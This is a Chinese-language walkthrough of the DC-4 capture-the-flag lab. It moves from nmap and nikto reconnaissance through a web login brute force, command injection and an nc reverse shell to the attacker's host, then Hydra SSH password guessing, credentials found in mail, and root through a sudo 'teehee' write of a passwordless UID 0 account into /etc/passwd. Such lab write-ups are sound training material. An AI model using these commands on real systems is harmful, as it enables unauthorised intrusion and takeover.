靶机页面
信息收集
查看DC4的IP地址
查看DC4的MAC地址为00:0C:29:90:C6:B0,然后用nmap扫描存活主机,发现DC4的MAC地址对应的IP为192.168.175.158
靶机的web页面
扫描DC4开启的端口
┌──(kali💋kali)-[~]
└─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.158
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-05 23:30 EDT
Nmap scan report for 192.168.175.158
Host is up (0.00076s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:90:C6:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.175.158OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds
端口 | 状态 | 服务 | 版本 |
---|---|---|---|
22 | open | ssh | OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) |
80 | open | http | nginx 1.15.10 |
web应用指纹信息
nikto报告
┌──(kali💋kali)-[~]
└─$ nikto -host http://192.168.175.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.175.158
+ Target Hostname: 192.168.175.158
+ Target Port: 80
+ Start Time: 2023-04-05 23:23:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-04-05 23:23:58 (GMT-4) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
渗透流程
登录框账户名密码暴力破解
使用brupsuite抓包,然后选择一个比较好的密码字典,对密码进行爆破
账户名为admin,密码为happy,登录
远程命令执行
登录进行后发现可以执行命令,比如列出文件列表
这时候想着是否能执行我们想要的命令呢?使用brupsuite抓包看看是否能修改为执行其他命令,比如whoami,看到能执行成功
接下来我们就可以利用这个远程命令执行来反弹shell
nc -e /bin/bash 192.168.175.144 1444
用kali监听1444端口,然后成功反弹
进入交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
SSH登录
切换到home目录,发现三个用户charles、jim、sam
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
进入charles和sam目录里面没有发现,但进入jim目录里面有发现
接着进入backups目录里,发现了old-passwords.bak这个文件,打开发现好像是一个密码字典,这时候我们可以想到jim用户ssh连接的密码就在这里
所以接着就利用这个密码字典,进行ssh爆破
先把这些密码在本地导入新文件,总共252条密码
接下来就用hydra爆破密码
hydra ssh://192.168.175.158 -l jim -P jim.dic -vV -f -t 64
账户名jim,密码jibril04
ssh登录
权限提升
查看mbox 文件,怀疑有邮件服务器
发现另外一封邮件,切换到var/mail,查看jim文件
发现charles把密码发给了jim,charles密码为^xHhA&hvim0y
接下来用charles这个用户进行ssh登录
查看sudo权限
sudo -l
发现使用/usr/bin/teehee 切换到root权限是不需要密码
teehee提权:
teehee命令可以对文件进行写入操作,我们可以借此来提权。
就是使用teehee -a 把一个账号密码写入到etc/passwd中,这个用户具有root权限,再切换到这个用户即可。
passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]
向/etc/passwd 文件中追加用户
echo "tacoking::0:0:::/bin/bash" | sudo teehee -a /etc/passwd #提权语句,追加用户
charles@dc-4:~$ su tacoking
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
查看flag
root@dc-4:/home/charles# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.If you enjoyed this CTF, send me a tweet via @DCAU7.